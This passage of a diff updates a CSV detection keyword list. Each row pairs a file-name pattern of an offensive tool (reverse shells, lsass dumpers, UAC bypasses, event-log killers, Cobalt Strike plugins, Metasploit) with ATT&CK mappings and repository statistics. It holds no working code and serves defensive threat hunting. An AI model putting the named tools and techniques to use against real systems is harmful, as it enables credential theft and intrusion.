+"*hijackDll*WINMM.dll*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*Hijacker*","offensive_tool_keyword","Hijacker","Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng. Airodump-ng. MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.This application requires an ARM android device with an internal wireless adapter that supports Monitor Mode. A few android devices do. but none of them natively. This means that you will need a custom firmware. Any device that uses the BCM4339 chipset (MSM8974. such as Nexus 5. Xperia Z1/Z2. LG G2. LG G Flex. Samsung Galaxy Note 3) will work with Nexmon (which also supports some other chipsets). Devices that use BCM4330 can use bcmon.","T1135 - T1175 - T1179 - T1189 - T1202","TA0002 - TA0007 - - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/chrisk44/Hijacker","1","0","N/A","N/A","10","2213","435","2020-08-26T19:01:31Z","2016-11-25T01:39:07Z" -"*HijackHunter.csproj*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*HijackHunter.exe*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" -"*hijackProgDirMissingDll*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","251","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*HijackHunter.csproj*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*HijackHunter.exe*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*hijackProgDirMissingDll*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*HInvokeHashGen.cs*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" "*history_cmd","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*HiveJack-Console.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" -"*hktalent/scan4all*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*hktalent/scan4all*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" "*hlldz/dazzleUP*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z" "*hlldz/Phant0m*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*hlldz/RefleXXion*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*hoangprod/AndrewSpecial*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*hoaxshell.py*","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1203 - T1133 - T1190","TA0001 - TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2655","443","2023-06-18T13:26:32Z","2022-07-10T15:36:24Z" -"*holehe *@gmail.com*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" -"*holehe.core:main*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" -"*holehe\holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" -"*holehe-master.*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5659","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*holehe *@gmail.com*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*holehe.core:main*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*holehe\holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" +"*holehe-master.*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z" "*hollow *.exe *.bin*","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","0","N/A","10","10","235","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" "*hollower.Hollow(*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*home/kali/Downloads*","offensive_tool_keyword","kali","Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Honey hash*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","New-HoneyHash.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*hookedbrowsers.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" -"*hook-infection_monkey.exploit.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*hook-infection_monkey.network.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*hook-infection_monkey.post_breach.actions.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*hook-infection_monkey.post_breach.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*hook-infection_monkey.ransomware.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*hook-infection_monkey.system_info.collectors.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","hook script for lsassy from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" -"*hook-pypsrp.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*Honey hash*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","New-HoneyHash.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*hookedbrowsers.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*hook-infection_monkey.exploit.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*hook-infection_monkey.network.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*hook-infection_monkey.post_breach.actions.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*hook-infection_monkey.post_breach.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*hook-infection_monkey.ransomware.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*hook-infection_monkey.system_info.collectors.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","hook script for lsassy from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*hook-lsassy.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*hook-pypsrp.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*hook-pypykatz.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*HOST/EXEGOL-01.*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Host: FUZZ.machine.org*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*HostEnum.ps1*","offensive_tool_keyword","red-team-scripts","script comprised of multiple system enumeration / situational awareness techniques collected over time. If system is a member of a Windows domain. it can also perform limited domain enumeration with the -Domain switch","T1016 - T1087.001 - T1049 - T1069","TA0007 - TA0003 - TA0006","N/A","N/A","Discovery","https://github.com/threatexpress/red-team-scripts","1","1","N/A","N/A","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" -"*HostExploiter.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" -"*HostingCLR_inject*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*HostingCLRx64.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit 